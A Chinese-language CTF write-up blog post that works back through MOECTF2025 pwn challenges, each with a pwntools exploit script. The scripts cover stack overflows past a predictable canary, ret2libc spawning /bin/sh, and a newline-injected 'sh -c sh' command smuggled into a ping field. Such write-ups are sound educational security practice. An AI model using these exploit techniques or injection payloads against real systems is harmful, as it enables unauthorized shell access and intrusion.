MOECTF2025复现中

Snowcat Lv1
  2026-01-26 12:00 2026-01-26 12:00 Created   2026-01-30 20:53:10 2026-01-30 20:53:10 Updated    

欢迎来到MOECTF2025!

boom

人工canary,提供了win函数,提示可以使用python的ctypes包

ctypes可以调用C库函数,于是使用ctypes加载libc

init()中有v0 = time(0LL),使time=0,

char s[124]; // [rsp+0h] [rbp-90h] BYREF

int v5; // [rsp+7Ch] [rbp-14h]

int v6; // [rsp+8Ch] [rbp-4h]

先填充0x90-0x14,再填充canary,再填充16+8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
import ctypes
import time

p = remote('192.168.50.1', 58472)
#p=process('./pwn')
libc = ctypes.CDLL('libc.so.6')
libc.srand(int(time.time()))
canary = libc.rand() % 114514
backdoor = 0x401276
ret = 0x40101a

p.sendlineafter(b'(y/n)', b'y')
payload = b'a' * 124 + p32(canary) + b'a'*24+p64(ret)+ p64(backdoor)

p.sendlineafter(b'Enter your message: ', payload)
p.interactive()

boom_revenge

同上(为什么重复几次才成功?)🤔

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
import ctypes
import time
p = remote('192.168.50.1', 62171)
#p=process('./pwn')
libc = ctypes.CDLL('libc.so.6')
libc.srand(int(time.time()))
canary = libc.rand() % 114514
backdoor = 0x401276
ret = 0x40101a

p.sendlineafter(b'(y/n)', b'y')
payload = b'a' * 124 + p32(canary) + b'a'*24+p64(ret)+ p64(backdoor)

p.sendlineafter(b'Enter your message: ', payload)
p.interactive()

inject

这是Rust写的吗

使用#注释-c 4

或第一个sh执行第二个sh ping sh -c sh -c 4

1
2
3
4
5
6
7
8
from pwn import *
#p=process('./pwn')
p=remote('192.168.50.1', 52971)
p.sendlineafter('Your choice: ',str(4))
#payload = "\nsh -c sh"
#payload="\nsh #"
p.sendafter('Enter host to ping: ',payload)
p.interactive()

ezlibc

开启了PIE,显然可以通过read泄露PIE基址,这里注意一下延迟绑定,还需要泄露libc,于是返回泄露libc

现在你掌握ret2libc了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import*
context.log_level='debug'
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
p=remote("192.168.50.1",65064)

p.recvuntil("use ")
leak_read=int((p.recv(14)),16)
pie_base=leak_read-0x1060
start=pie_base+0x10c0

payload=b"A"*40+p64(start)
p.send(payload)

p.recvuntil("use ")
leak_read2 = int(p.recv(14),16)
libc_base=leak_read2-libc.symbols['read']
system=libc_base+libc.symbols['system']
bin_sh=libc_base+next(libc.search(b'/bin/sh'))
pop_rdi=libc_base+0x2a3e5
ret=pie_base+0x101a
payload=b"a"*40+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system)
p.send(payload)
p.interactive()

randomlock

猜测seed是1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
import ctypes

libc = ctypes.CDLL("libc.so.6")
libc.srand(1)

p = remote('192.168.50.1',62581)

p.recvuntil(b">")

for i in range(10):
    r = libc.rand() % 10000
    p.sendline(str(r).encode())
    if i < 9:
        p.recvuntil(b">")

print(p.recvall())

str_check

使用\x00截断字符串,字符串前4是moew,填充后门

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.log_level='debug'
p=remote('192.168.50.1',53500)
#p=process('./pwn')
elf = ELF('./pwn')
backdoor=0x40123b
payload=b'meow\x00'.ljust(0x20+8,b'a')+p64(backdoor)
p.sendlineafter(b'say?',payload)
p.sendlineafter('?',b'200')
p.interactive()

syslock

to be continued

  • Title: MOECTF2025复现中
  • Author: Snowcat
  • Created at : 2026-01-26 12:00:00
  • Updated at : 2026-01-30 20:53:10
  • Link: https://sadsnowcat.github.io/2026/01/26/MOECTF2025复现中/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
MOECTF2025复现中
  1. boom
  2. boom_revenge
  3. inject
  4. ezlibc
  5. randomlock
  6. str_check
  7. syslock